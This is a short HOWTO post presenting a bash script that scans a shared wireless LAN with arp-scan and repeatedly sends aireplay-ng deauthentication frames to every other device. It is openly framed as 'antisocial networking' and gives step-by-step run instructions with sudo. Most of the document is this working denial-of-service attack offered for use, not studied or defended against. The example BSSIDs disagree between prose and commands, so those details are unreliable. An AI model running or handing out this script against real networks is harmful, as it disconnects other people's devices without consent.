HOWTO: De-authing wireless clients

FROM: NETWORKSHOP
SKILL LEVEL: AGILE

De-authing Wireless Clients

The below script demonstrates a method for finding other devices on the wireless LAN you share and deauthenticating them, in the spirit of antisocial networking. It requires a GNU/Linux host, aircrack-ng (provides airreplay-ng) and arp-scan, all of which are in the repositories for most Linux distributions.

Example code

#!/bin/bash
# ANTISOCIAL WIRELESS NETWORK SCRIPT
# requires arp-scan, aireplay-ng and a GNU/Linux host
# exec as follows:
#
#   ./deauth.sh <WIRELESS NIC> <BSSID OF ACCESS POINT>

NIC=$1
BSSID=$2
MAC=$(/sbin/ifconfig | grep $NIC | head -n 1 | awk '{ print $5 }')

while true;
    do
        for TARGET in $(sudo arp-scan -I $NIC --localnet | grep -o -E \
        '([[:xdigit:]]{1,2}:){5}[[:xdigit:]]{1,2}'):
           do
               if [ "$TARGET" != "$MAC" ]
                   then
                       sudo aireplay-ng -0 1 -a $BSSID -c $TARGET $NIC
                       echo "Feeling Antisocial. Deauthing: " $TARGET
               fi
           done
           sleep 5
done

We can copy the text into a file like ‘deauth.sh’ and run it as sudo.

Example: our wireless adapter is wlan0 and our target BSSID 1C:AF:F0:16:26:B4:

sudo sh deauth.sh wlan0 1B:AA:F0:16:26:B4

It’s often more convenient to make our shell scripts executable, as that way they can be run from a directory put in our $PATH, like ~/bin or executed in a more elegant fashion.

To do so, we’ll use the program chmod, whose purpose is to change permissions and properties. Here we add (+) the executable (x) property to the script.

chmod +x deauth.sh

Run the shell script with super-user privileges (‘sudo’)

sudo ./deauth.sh wlan0 1B:AA:F0:16:26:B4